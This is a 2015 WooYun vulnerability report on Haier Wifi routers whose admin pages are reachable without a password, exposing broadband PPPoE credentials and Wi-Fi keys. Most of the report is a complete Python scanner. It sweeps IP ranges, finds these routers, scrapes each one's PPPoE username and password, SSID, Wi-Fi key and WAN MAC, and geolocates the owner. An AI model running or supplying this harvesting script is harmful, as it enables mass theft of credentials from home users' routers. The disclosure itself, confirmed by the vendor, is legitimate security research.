当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134297

漏洞标题:Haier Wifi 未授权访问直接泄露宽带信息以及wifi密码(附扫描脚本)

相关厂商:海尔集团

漏洞作者: 一只猿

提交时间:2015-08-15 14:24

修复时间:2015-10-03 17:42

公开时间:2015-10-03 17:42

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-15: 细节已通知厂商并且等待厂商处理中
2015-08-19: 厂商已经确认,细节仅向厂商公开
2015-08-29: 细节向核心白帽子及相关领域专家公开
2015-09-08: 细节向普通白帽子公开
2015-09-18: 细节向实习白帽子公开
2015-10-03: 细节向公众公开

简要描述:

未授权访问

详细说明:

Haier Wifi 路由器管理界面无需密码可直接远程访问,无需其他认证即可获取宽带账号密码以及wifi的ssid和key,使用脚本扫描网段即可轻松获取一部分设备信息。

漏洞证明:

扫描了少量网段,此类小众路由器使用量并不是太大,但是也是存在风险。给出多个实例截图

2015-08-15 13:06:37 的屏幕截图.png

2015-08-15 13:07:30 的屏幕截图.png

2015-08-15 13:07:32 的屏幕截图.png

2015-08-15 13:07:35 的屏幕截图.png

2015-08-15 13:07:37 的屏幕截图.png

2015-08-15 13:07:39 的屏幕截图.png

2015-08-15 13:07:42 的屏幕截图.png


下面给出扫描的结果

2015-08-15 13:09:48 的屏幕截图.png

2015-08-15 13:20:02 的屏幕截图.png

2015-08-15 13:13:25 的屏幕截图.png

下面给出扫描的脚本

#!/usr/bin/env python
# coding=utf-8
# code by 92ez.com
# last modify time 2015-08-15 13:21
import Queue
from threading import Thread
import time
import re
import sys
import subprocess
import json
import urllib2
#ip to num
def ip2num(ip):
    ip = [int(x) for x in ip.split('.')]
    return ip[0] << 24 | ip[1] << 16 | ip[2] << 8 | ip[3]
#num to ip
def num2ip(num):
    return '%s.%s.%s.%s' % ((num & 0xff000000) >> 24,
                            (num & 0x00ff0000) >> 16,
                            (num & 0x0000ff00) >> 8,
                            num & 0x000000ff)
#get all ips list between start ip and end ip
def ip_range(start, end):
    return [num2ip(num) for num in range(ip2num(start), ip2num(end) + 1) if num & 0xff]
#main function
def bThread(iplist):
    SETTHREAD = raw_input('Thread: ')
    print '[Note] Running...\n'
    threadl = []
    queue = Queue.Queue()
    hosts = iplist
    for host in hosts:
        queue.put(host)
    threadl = [tThread(queue) for x in xrange(0, int(SETTHREAD))]
    for t in threadl:
        t.start()
    for t in threadl:
        t.join()
#get host position by Taobao API
def getposition(host):
    try:
        ipurl = "http://ip.taobao.com/service/getIpInfo.php?ip="+host
        jsondata = urllib2.urlopen(ipurl).read()
        value = json.loads(jsondata)['data']
        info = [value['country'],value['region'],value['city'],value['isp'] ]
        return info
    except Exception, e:
        print "[Note] Get "+ host+" position failed , will retry ...\n"
        getposition(host)
#create thread
class tThread(Thread):
    def __init__(self, queue):
        Thread.__init__(self)
        self.queue = queue
    def run(self):
        global PORT
        while not self.queue.empty():
            host = self.queue.get()
            try:
                #print host
                checktitle(host,PORT)
            except:
                continue
def checktitle(host,port):
    aimurl = "http://"+host+":"+port
    try:
        f = urllib2.urlopen(aimurl,timeout = 5)
        htmlcontent = f.read()
        f.close()
        title = re.findall(r'<title>(.+?)</title>',htmlcontent)
        
        if title[0].encode('utf8') == "Haier Wifi":
            pppoeusername = re.findall(r'name=\"wan_pppoe_username\" size=\"30\" maxlength=\"128\" value=\"(.+?)\">',htmlcontent)
            pppoeupassword = re.findall(r'name=\"wan_pppoe_passwd\" size=\"30\" maxlength=\"128\" value=\"(.+?)\">',htmlcontent)
            ssid = re.findall(r'var ssid = \'(.+?)\'',htmlcontent)
            key = re.findall(r'var psk = \'(.+?)\'',htmlcontent)
            wanmac = re.findall(r'var factoryWanMac=\"(.+?)\"',htmlcontent)
            posinfo = getposition(host)
            print "Found "+ title[0].encode('utf8') + "\nurl: "+aimurl
            print "pppoeusername: "+pppoeusername[0].encode('utf8')+" pppoeupassword: "+pppoeupassword[0].encode('utf8')
            print "ssid: "+ssid[0]+" key: "+key[0].encode('utf8')
            print "factoryWanMac: "+wanmac[0].encode('utf8')
            print posinfo[0].encode('utf8')+" "+posinfo[1].encode('utf8')+" "+posinfo[2].encode('utf8')+" "+posinfo[3].encode('utf8')+"\n"
            
    except Exception, e:
        pass
if __name__ == '__main__':
    print '\nScan Haier Wifi Router program.\n'
    
    startIp = raw_input('Start IP: ')
    endIp = raw_input('End IP: ')
    port = raw_input('Port: ')
    global PORT
    PORT = port
    iplist = ip_range(startIp, endIp)
    print '\n[Note] Will scan '+str(len(iplist))+" ips...\n"
    bThread(iplist)

修复方案:

至少得加个密码什么的吧,这样裸奔真的好吗

版权声明:转载请注明来源 一只猿@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-08-19 17:40

厂商回复:

感谢乌云平台白帽子的测试与提醒,我方已安排人员进行处理

最新状态:

暂无